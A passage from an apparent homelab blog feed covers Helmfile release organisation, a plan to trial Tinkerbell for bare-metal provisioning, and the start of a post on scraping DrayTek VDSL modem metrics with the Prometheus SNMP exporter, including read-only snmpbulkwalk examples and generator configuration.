I like using this approach in one instance, namely for <code>appVersion</code>-like values
on Helm charts I wrote myself. Here&rsquo;s an example from my Audiobookshelf entry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">audiobookshelf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">./audiobookshelf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">audiobookshelf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">appVersion</span>: <span style="color:#e6db74">&#34;2.23.0&#34;</span>
</span></span></code></pre></div><p>The fact that I have the appVersion in the Helmfile directly makes it a lot more
convenient when I do my regular service update rounds. Unless something deeper
changed, I just need to have my Helmfile open during Service Upgrade Friday and
either update the chart version or the <code>appVersion</code> right there, without having
to switch between all of the <code>values.yaml</code> or <code>Chart.yaml</code> files.</p>
<p>For my standard approach, I&rsquo;m currently working with two release entries when
using a 3rd party chart. Let&rsquo;s look at my <a href="https://forgejo.org/">Forgejo</a>
deployment as an example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">code.forgejo.org/forgejo-helm</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">oci</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">forgejo/forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">12.5.1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./forgejo/hl-values.yaml.gotmpl</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-addons</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">forgejo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">./forgejo-addons</span>
</span></span></code></pre></div><p>In this approach, the <code>forgejo/hl-values.yaml.gotmpl</code> file is the <code>values.yaml</code>
file for the Forgejo chart. But, in most instances, 3rd party charts don&rsquo;t
contain everything I need. One example which comes up almost every single time
are additional ExternalSecret manifests for credentials, or ObjectBucketClaims
for S3 buckets in my Ceph cluster. And those Yaml files need to go somewhere.</p>
<p>And that&rsquo;s what the <code>$chartname-addon</code> chart is for. It&rsquo;s a normal Helm chart,
including <code>Chart.yaml</code> and <code>templates/</code> directory. It also gets its own <code>values.yaml</code>
file. It gets deployed into the same Namespace as the primary chart.</p>
<p>I also trialed a different approach with some of my earliest charts. For those,
I created a &ldquo;parent&rdquo; chart, which contained the <code>Chart.yaml</code> and any additional
manifests on top of the 3rd party chart. Then said 3rd party chart got added
as a dependency. But I moved away from that approach, as I found the separation
between 3rd party chart and my own manifests in the <code>$chartname-addons</code> approach
more appealing. There was also the
fact that I couldn&rsquo;t just update the version of the 3rd party chart and then
deploy - Helm would always error out due to the <code>Chart.lock</code> file being
outdated. I moved away from this model completely.</p>
<h2 id="why-not-gitops">Why not GitOps?</h2>
<p>So the obvious question might be: Why not employ GitOps like Argo or Flux?
Mostly: Time. &#x1f601; I&rsquo;m not adverse to adding additional complexity to my
Homelab just for the fun of it. But a GitOps tool should have its own management
cluster, as it wouldn&rsquo;t make much sense to me to have e.g. ArgoCD running in
the same cluster that it&rsquo;s managing. So I skipped this option when I initially
looked for how I wanted to manage it all.</p>
<p>There&rsquo;s also the additional hassle of &ldquo;Okay, and then where will I store the
repo and execute the automation?&rdquo;. I have a Forgejo instance and Woodpecker as
CI, but both of those are deployed in my main cluster. So they would be controlled
by ArgoCD - which they would also be hosting.
But on the other hand, there&rsquo;s also the challenge to come up with something
reasonably small that can serve ArgoCD without being too much of a hassle.</p>
<p>Finally, there&rsquo;s also my current workflow: I generally work on a thing until it
works properly, and then it gets a commit in the Homelab repo. It would feel a
bit weird to make a commit for every thing I change, for no other reason than
that I need said commit to trigger a new deployment. I&rsquo;m used to this approach
from work, but there the CI triggers hundreds upon hundreds of jobs and tens of
thousands of tests. It is literally impossible to run the software on our
developer machines. But here? Making a commit for every change, pushing it just
to make a test deploy - it just feels a bit much?</p>
<p>All of the above being said - I&rsquo;d really like to hear what those of you who do
run GitOps tools to manage your cluster get out of it. What advantages does it
have for you? And what&rsquo;s your workflow? Do you perhaps always work with Helm
locally, and then let Argo do it&rsquo;s thing once everything already works? Ping me
<a href="https://social.mei-home.net/@mmeier">on the Fediverse</a>. I&rsquo;m genuinely curious.
And quite frankly, I want to be convinced - one more project for the Homelab
pile. &#x1f601;</p>
<h2 id="finale">Finale</h2>
<p>And that&rsquo;s it already for this one. I&rsquo;ve had it sitting in draft state for way
too long.</p>
<p>The next post will likely be on the setup of the tinkerbell lab, as I&rsquo;m done
with that now and have already deployed tinkerbell - but it&rsquo;s not working properly
yet.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part I: The Plan</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-1-plan/</link>
      <pubDate>Thu, 29 May 2025 12:00:13 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-1-plan/</guid>
      <description>Into to the Tinkerbell deployment</description>
      <content:encoded><![CDATA[<p>A rough overview of my plan for trialing tinkerbell in my Homelab.</p>
<p>This is part 1 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">tinkerbell series</a>.</p>
<p>I&rsquo;m planning to trial <a href="https://tinkerbell.org/">tinkerbell</a> in my Homelab to
improve my baremetal provisioning setup. This first post will be the plan and
the reason why I&rsquo;m doing this.</p>
<p>Tinkerbell is a system for provisioning baremetal machines. It is deployed into
a Kubernetes cluster and consists of a controller, a DHCP/netboot server, a
metadata provider e.g. for cloud-init data, and an in-memory OS for running
workflows. The basic idea is that new machines netboot into that in-memory OS
and execute workflows configured in tinkerbell to install the actual OS.</p>
<h2 id="the-current-provisioning-setup">The current provisioning setup</h2>
<p>Before going into detail on the plan for the future, let&rsquo;s have a look at what
my provisioning pipeline currently looks like.</p>
<p>The first step of any setup is to create an individual disk image for the new machine.
I&rsquo;ve standardized on Ubuntu server for all of my Homelab hosts, as it supports
Raspberry Pis well and thus allows me to run the same Linux distro on the entire
Homelab. The image generation varies a bit between Pis and x86 hosts. But both
use HashiCorp&rsquo;s <a href="https://developer.hashicorp.com/packer">Packer</a> to create
an image, followed by a short Ansible playbook which prepares the image for
further provisioning with my main Ansible playbook.</p>
<p>For my Pis, this preparation is done in a chroot with qemu-arm-static, based
on Ubuntu&rsquo;s preinstalled Pi images. For x86 hosts, a normal Ubuntu install is
run in a Qemu VM. Once the image is prepared, I stick a USB drive into the new
host and <code>dd</code> the image onto the disk, either a local disk or a Ceph RBD, depending
on whether it&rsquo;s a diskless host or not.</p>
<p>And this, overall, seems rather unnecessarily complicated and manual. First of
all, the short Ansible playbook I run to prepare the image for further provisioning
only does the following:</p>
<ul>
<li>Installs a couple of packages Ansible needs to run, e.g. Python</li>
<li>Adds my standard Homelab Ansible user, sets up <code>sudo</code> and deploys the SSH key</li>
<li>Sets the hostname</li>
</ul>
<p>For netbooting hosts, it does a few more things:</p>
<ul>
<li>Sets the boot partition to point to the correct NFS mount</li>
<li>Sets the kernel command line to mount the right RBD</li>
</ul>
<p>Most of these steps could be done via <a href="https://cloud-init.io/">cloud-init</a>, removing
the need to generate individual images per host entirely. This is one big goal
of the tinkerbell introduction: Getting rid of per-host images and ending up with
only two base images, one for Pis and one for x86 hosts.</p>
<p>In addition, I&rsquo;m hoping that tinkerbell&rsquo;s workflows allow me to also automate the
image install, so I can also get rid of the need to boot from a USB stick and do
it manually.</p>
<h2 id="the-plan">The plan</h2>
<p>I recently bought a couple of Raspberry Pi 5 to replace my Kubernetes control
plane nodes. When I did so, I ordered one additional Pi, with 16 GB of RAM and
a 1 TB SSD. That Pi will soon replace what I call my &ldquo;Cluster Master&rdquo;. It&rsquo;s a
host explicitly intended to be bootable and run its services without any external
dependencies. It, in turn, then hosts foundational services for the rest of the Homelab.
That machine will host a new Kubernetes cluster for tinkerbell.</p>
<p>But I will not jump right into that setup. Instead, I plan to first make a setup
on my desktop with a couple of VMs to kick the tires on tinkerbell, because there
are a couple of open questions:</p>
<ol>
<li>How exactly does the DHCP server behave? Does it run in proxy mode? Does it
have to be the only DHCP server in the subnet?</li>
<li>How does tinkerbell work in general?</li>
<li>Can I make tinkerbell work with Pi 4? What about Pi 5?</li>
<li>Can I make tinkerbell work with my netboot setup?</li>
</ol>
<p>All of these will be answered in the experimental phase. The general answer on
question 3), at least for Pi 4, seems to be &ldquo;Eh, possibly&rdquo;. This is also the
biggest stumbling block I see. As I noted above, tinkerbell runs an in-memory OS
to execute its workflow for installing the main OS. So the main challenge will be
to get the Pis booted into that OS. But then again, the Pi netboot can already
boot into a given kernel and initramfs. So unless tinkerbell somehow has a hard
requirement on iPXE boot, I should be able to somehow get it to work on the Pis.
I expect this to be the most fun part of the entire endeavor. &#x1f913;</p>
<p>For this experimentation phase, I intend to set up a lab environment on my desktop.
I decided to do this for two reasons:</p>
<ol>
<li>I need to isolate it from the Homelab for now, due to tinkerbell running a DHCP
server</li>
<li>My past work on netboot has shown that doing the experimentation on a VM you
can easily interact with has a huge advantage</li>
</ol>
<p>I actually thought a lot about how to manage the VMs for this setup on my desktop.
I got burned pretty hard by VirtualBox in the past, so that was out. The last
time I set up a VM lab on my desktop, I used Qemu directly, with a bit of bash
scripting around it. See <a href="https://blog.mei-home.net/posts/testvm-for-netbooting/">this post</a>
if you&rsquo;re interested. What I was looking for this time was something in between
&ldquo;needs a daemon running&rdquo; and &ldquo;big ball of bash&rdquo;.
I looked at <a href="https://developer.hashicorp.com/vagrant">HashiCorp&rsquo;s Vagrant</a> at
first, and will give it a try with the <a href="https://github.com/ppggff/vagrant-qemu">QEMU provider</a>.
If that does not work out for some reason, I will instead use <a href="https://linuxcontainers.org/incus/">Incus</a>.
It&rsquo;s a bit more than I really want to set up on my desktop, but on the other hand
I&rsquo;m pretty familiar with LXD VMs.
The big advantage of Vagrant is that there&rsquo;s no daemon running, and I get
version-controllable configs out of the box. For Incus, I&rsquo;d also set up OpenTofu,
so I could put the config under version control, instead of ending up with a docs
page listing the CLI commands to execute in order to set it all up.</p>
<p>Once that&rsquo;s done, I will have to set up a Kubernetes cluster on the VM to install
tinkerbell into. I&rsquo;m currently planning to use k3s, as it seems to be the default
choice for single node clusters.</p>
<p>This setup will happen regardless of whether I ultimately deploy tinkerbell or not.
My main reason is that I&rsquo;d like to just standardize as much as possible on
deploying everything with Kubernetes, even outside the main cluster. This will
also entail looking to deploy the apps currently running baremetal on my Master.
The main one is DNSmasq, providing a TFTP boot server for my diskless hosts.
But I also have further plans for a &ldquo;management&rdquo; style Kubernetes cluster. Namely,
I also want to try out GitOps for my Kubernetes cluster, for example with ArgoCD.
That also calls for a separate cluster setup. And finally, I would also like to
trial cluster API, just for the fun of it.</p>
<p>For the Kubernetes distribution I settled on k3s. It&rsquo;s supposed to be relatively
lightweight, and it seems to run quite nicely in a single node setup from what
I&rsquo;ve read.</p>
<p>So overall, the plan entails the following steps:</p>
<ol>
<li>Create a new VLAN to properly isolate the tinkerbell experiment, and specifically
its DHCP server</li>
<li>Set up a VM with Vagrant or Incus on my desktop for experimentation</li>
<li>Create a k3s single-node cluster on the VM</li>
<li>Install tinkerbell in the cluster</li>
<li>Kick the tires for provisioning a second VM</li>
<li>Try to get provisioning working on a Pi 4 and a Pi 5</li>
<li>If everything works, deploy it in the Homelab</li>
</ol>
<p>And that&rsquo;s it already on the planning front. This is a lot more experimental
than my Kubernetes migration was, so there&rsquo;s not that much to plan up front. I
didn&rsquo;t need a single flow chart. &#x1f601;</p>
<p>Next will be a post on the lab setup on my desktop, once I&rsquo;ve got that running.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Gathering SNMP Metrics with the SNMP Exporter</title>
      <link>https://blog.mei-home.net/posts/snmp-exporter/</link>
      <pubDate>Sun, 25 May 2025 22:20:55 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/snmp-exporter/</guid>
      <description>Gathering metrics from a DrayTek VDSL modem</description>
      <content:encoded><![CDATA[<p>I have been gathering metrics from my <a href="https://www.draytek.de/vigor165.html">DrayTek Vigor 165 modem</a> for a while now,
and finally got around to documenting the setup, so now you get to read about it.</p>
<p>I&rsquo;m using the Vigor 165 to connect to the Internet via a Deutsche Telekom
250 Mbit/s VDSL connection. That modem supports SNMP and can provide metrics
like the line speed or quality. A couple of years back, I wanted to get that
data into my Grafana dashboards. After some searching, I came across the
<a href="https://github.com/prometheus/snmp_exporter">SNMP Exporter</a>.</p>
<p>The way the exporter works is by regularly making SNMP requests to the targets
and providing the data in the standard Prometheus format. And because it involves
SNMP, the setup is a bit more involved than your average exporter.</p>
<h2 id="snmp">SNMP</h2>
<p>SNMP is the <a href="https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol">Simple Network Management Protocol</a>.
As the name implies, the protocol is intended for managing networking devices,
like modems or routers. I&rsquo;ve never worked professionally in the networking area,
so I don&rsquo;t have any experience with actively managing network devices like switches
via SNMP. And as far as I&rsquo;m aware, my modem is the only device that supports
SNMP in my Homelab. So I won&rsquo;t be discussing the configuration part here, only the
read-only part my modem uses for providing metrics.</p>
<p>Information in SNMP is organized according to management information base (MIB)
files, which specify what variables are available, and their hierarchy. Here is
one such file, defining the variables for VDSL information: <a href="https://github.com/librenms/librenms/blob/master/mibs/VDSL2-LINE-MIB">VDSL2-LINE-MIB</a>.
While these files can be read by humans, I always kept to websites like
<a href="https://mibs.observium.org/">observium</a> for browsing them.</p>
<p>I think for the purposes of understanding the format, an example result from
querying my modem is going to more illuminating than me trying to describe what
SNMP queries look like:</p>
<pre tabindex="0"><code>snmpbulkwalk -v 2c -c example 203.0.113.1
IF-MIB::ifType.1 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.4 = INTEGER: vdsl2(251)
IF-MIB::ifType.5 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.6 = INTEGER: propVirtual(53)
IF-MIB::ifType.7 = INTEGER: propVirtual(53)
IF-MIB::ifType.8 = INTEGER: propVirtual(53)
IF-MIB::ifType.9 = INTEGER: propVirtual(53)
IF-MIB::ifType.10 = INTEGER: propVirtual(53)
IF-MIB::ifType.11 = INTEGER: propVirtual(53)
IF-MIB::ifType.12 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifType.13 = INTEGER: ethernetCsmacd(6)
IF-MIB::ifMtu.1 = INTEGER: 1500
IF-MIB::ifMtu.4 = INTEGER: 1500
IF-MIB::ifMtu.5 = INTEGER: 1500
IF-MIB::ifMtu.6 = INTEGER: 1500
IF-MIB::ifMtu.7 = INTEGER: 1500
IF-MIB::ifMtu.8 = INTEGER: 1500
IF-MIB::ifMtu.9 = INTEGER: 1500
IF-MIB::ifMtu.10 = INTEGER: 1500
IF-MIB::ifMtu.11 = INTEGER: 1500
IF-MIB::ifMtu.12 = INTEGER: 1500
IF-MIB::ifMtu.13 = INTEGER: 1500
IF-MIB::ifSpeed.1 = Gauge32: 1000000000
IF-MIB::ifSpeed.4 = Gauge32: 292016000
IF-MIB::ifSpeed.5 = Gauge32: 1000000000
IF-MIB::ifSpeed.6 = Gauge32: 0
IF-MIB::ifSpeed.7 = Gauge32: 0
IF-MIB::ifSpeed.8 = Gauge32: 0
IF-MIB::ifSpeed.9 = Gauge32: 1000000000
IF-MIB::ifSpeed.10 = Gauge32: 1000000000
IF-MIB::ifSpeed.11 = Gauge32: 1000000000
IF-MIB::ifSpeed.12 = Gauge32: 1000000000
IF-MIB::ifSpeed.13 = Gauge32: 1000000000
</code></pre><p>The <code>snmpbulkwalk</code> command has the advantage over other SNMP commands that it
just walks everything the target has to offer, instead of having to provide the
OIDs (Object Identifier) to be queried explicitly.</p>
<p>The above output shows a couple of values from my modem, regarding the setup
of its network interfaces. You can for example see that interface <code>.4</code> is the
VDSL interface, while <code>.1</code>, <code>.5</code> are Ethernet interfaces. The <code>ifSpeed</code> object then
shows the speed. The <code>-v 2c</code> parameter in the command provides the SNMP version
to be used, which <code>-c example</code> defines the <code>community</code>. The community is sort-of
an identifier.</p>
<p>SNMP itself, until version 3, does not support any kind of authentication at all.
So none needs to be provided. As my modem only supports querying but not configuration,
that&rsquo;s okay.</p>
<p>The interesting information for me comes a bit later in the output of the same
command:</p>
<pre tabindex="0"><code>[...]
SNMPv2-SMI::transmission.94.1.1.3.1.7.4 = INTEGER: -3
SNMPv2-SMI::transmission.94.1.1.3.1.8.4 = Gauge32: 51374000
SNMPv2-SMI::transmission.94.1.1.4.1.1.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.4.1.2.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.4.1.3.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.4.1.4.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.1.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.2.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.3.4 = Gauge32: 0
SNMPv2-SMI::transmission.94.1.1.5.1.4.4 = Gauge32: 0
SNMPv2-SMI::transmission.251.1.2.2.1.1.4.2 = INTEGER: 2
SNMPv2-SMI::transmission.251.1.2.2.1.2.4.1 = Gauge32: 292016000
SNMPv2-SMI::transmission.251.1.2.2.1.2.4.2 = Gauge32: 46718000
SNMPv2-SMI::transmission.251.1.2.2.1.3.4.1 = Gauge32: 0
SNMPv2-SMI::transmission.251.1.2.2.1.3.4.2 = Gauge32: 0
SNMPv2-SMI::transmission.251.1.2.2.1.4.4.1 = INTEGER: 9
SNMPv2-SMI::transmission.251.1.2.2.1.4.4.2 = INTEGER: 0
SNMPv2-SMI::transmission.251.1.2.2.1.5.4.1 = INTEGER: 305
SNMPv2-SMI::transmission.251.1.2.2.1.5.4.2 = INTEGER: 150
SNMPv2-SMI::transmission.251.1.2.2.1.6.4.1 = INTEGER: 0
SNMPv2-SMI::transmission.251.1.2.2.1.6.4.2 = INTEGER: 0
[...]
</code></pre><p>These outputs, on their own, are not really that useful. Note especially the
<code>251.1.2.2.1</code> and <code>94.1.1.3.1</code> as part of the OIDs. That indicates that
<code>snmpbulkwalk</code> did not have the necessary MIBs to properly decode the information
received from my modem. This can be fixed by making those MIBs available.
Helpfully, DrayTek provides the supported MIBs for the devices <a href="https://www.draytek.com/support/knowledge-base/5517">on their website</a>.
Namely, the following MIBs are supported:</p>
<ul>
<li><a href="https://mibbrowser.online/mibdb_search.php?mib=SNMPv2-MIB">SNMPv2-MIB</a></li>
<li><a href="https://mibbrowser.online/mibdb_search.php?mib=ADSL-LINE-MIB">ADSL-LINE-MIB</a></li>
<li><a href="https://mibbrowser.online/mibdb_search.php?mib=VDSL2-LINE-MIB">VDSL2-LINE-MIB</a></li>
</ul>
<p>All of the links go to <a href="https://mibbrowser.online">mibbrowser</a>, which I&rsquo;ve found
a useful page to download MIBs. To make <code>snmpbulkwalk</code> use those additional MIBs,
download them into a local directory and start <code>snmpbulkwalk</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>snmpbulkwalk -M /path/to/downloaded/mibs/:/usr/share/snmp/mibs -m ALL -v 2c -c example 203.0.113.1
</span></span></code></pre></div><p>The <code>/usr/share/snmp/mibs</code> is the path to some general MIBs on my Gentoo system,
so you don&rsquo;t have to download the more common MIBs.</p>
<p>With that invocation, the above example becomes a lot clearer:</p>
<pre tabindex="0"><code>ADSL-LINE-MIB::adslAturCurrOutputPwr.4 = INTEGER: -3 tenth dBm
ADSL-LINE-MIB::adslAturCurrAttainableRate.4 = Gauge32: 51192000 bps
ADSL-LINE-MIB::adslAtucChanInterleaveDelay.4 = Gauge32: 0 milli-seconds
ADSL-LINE-MIB::adslAtucChanCurrTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAtucChanPrevTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAtucChanCrcBlockLength.4 = Gauge32: 0 byte
ADSL-LINE-MIB::adslAturChanInterleaveDelay.4 = Gauge32: 0 milli-seconds
ADSL-LINE-MIB::adslAturChanCurrTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAturChanPrevTxRate.4 = Gauge32: 0 bps
ADSL-LINE-MIB::adslAturChanCrcBlockLength.4 = Gauge32: 0
VDSL2-LINE-MIB::xdsl2ChStatusUnit.4.xtur = INTEGER: xtur(2)
VDSL2-LINE-MIB::xdsl2ChStatusActDataRate.4.xtuc = Gauge32: 292016000 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusActDataRate.4.xtur = Gauge32: 46718000 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusPrevDataRate.4.xtuc = Gauge32: 0 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusPrevDataRate.4.xtur = Gauge32: 0 bits/second
VDSL2-LINE-MIB::xdsl2ChStatusActDelay.4.xtuc = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 9
VDSL2-LINE-MIB::xdsl2ChStatusActDelay.4.xtur = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 0
VDSL2-LINE-MIB::xdsl2ChStatusActInp.4.xtuc = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 305
VDSL2-LINE-MIB::xdsl2ChStatusActInp.4.xtur = Wrong Type (should be Gauge32 or Unsigned32): INTEGER: 150
VDSL2-LINE-MIB::xdsl2ChStatusInpReport.4.xtuc = INTEGER: 0
VDSL2-LINE-MIB::xdsl2ChStatusInpReport.4.xtur = INTEGER: 0
</code></pre><p>The addition of the correct MIBs allows <code>snmpbulkwalk</code> to correctly interpret
the values coming from the modem. I&rsquo;m not 100% sure what the <code>Wrong Type</code> errors
are about, but I assume that the modem just doesn&rsquo;t implement the MIB quite
correctly.</p>
<h2 id="configuring-the-snmp-exporter">Configuring the SNMP exporter</h2>
<p>As I&rsquo;ve noted above, the configuration of the SNMP exporter is a bit more involved.</p>
<p>First, a generator config needs to be created. In my case, it looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">auths</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">community</span>: <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">modules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">walk</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.6.4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.4.4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.5.4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.1.5</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.1</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.2</span>
</span></span></code></pre></div><p>As you can see, I&rsquo;m only declaring a handful of values I actually want to gather.
I&rsquo;m skipping most of the per-interface data, because I can already get that data
from the PPPoE interface on my OPNsense router. I&rsquo;ve restricted my gathering to
the modem specific data:</p>
<ul>
<li><code>1.3.6.1.2.1.10.94.1.1.3.1.6</code>: Current status of the ADSL line</li>
<li><code>1.3.6.1.2.1.10.94.1.1.3.1.4</code>: Current noise on the line</li>
<li><code>1.3.6.1.2.1.10.94.1.1.3.1.5</code>: Current attenuation on the line</li>
<li><code>1.3.6.1.2.1.1.5</code>: System name</li>
<li><code>1.3.6.1.2.1.10.251.1.2.2.1.2</code>: Current actual data rate on the line, Up and Down</li>
</ul>
<p>With that defined, the SNMP exporter config file can be generated. But first,
I needed to build the generator. For this, I cloned the <a href="https://github.com/prometheus/snmp_exporter">SNMP exporter repo</a>
and switched into the <code>generator/</code> directory. There, I ran this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>make generator
</span></span></code></pre></div><p>And then finally, I was able to run the command to generate the SNMP exporter
config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>./generator generate -m /PATH/TO/MIB/DIR -g /PATH/TO/generator.yml -o snmp.yaml
</span></span></code></pre></div><p>With the configuration above, the result looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e"># WARNING: This file was auto-generated using snmp_exporter generator, manual changes will be lost.</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">auths</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">community</span>: <span style="color:#ae81ff">example</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">security_level</span>: <span style="color:#ae81ff">noAuthNoPriv</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth_protocol</span>: <span style="color:#ae81ff">MD5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">priv_protocol</span>: <span style="color:#ae81ff">DES</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">modules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">draytek</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">get</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.1.5.0</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.1</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2.4.2</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.4.4</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.5.4</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">1.3.6.1.2.1.10.94.1.1.3.1.6.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">sysName</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">DisplayString</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">An administratively-assigned name for this managed node - 1.3.6.1.2.1.1.5</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">xdsl2ChStatusActDataRate</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">oid</span>: <span style="color:#ae81ff">1.3.6.1.2.1.10.251.1.2.2.1.2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">help</span>: <span style="color:#ae81ff">The actual net data rate at which the bearer channel is operating, if</span>
</span></span><span style="display:flex;"><span>        <span style="color:#ae81ff">in L0 power management state - 1.3.6.1.2.1.10.251.1.2.2.1.2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">indexes</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">labelname</span>: <span style="color:#ae81ff">ifIndex</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">gauge</span>
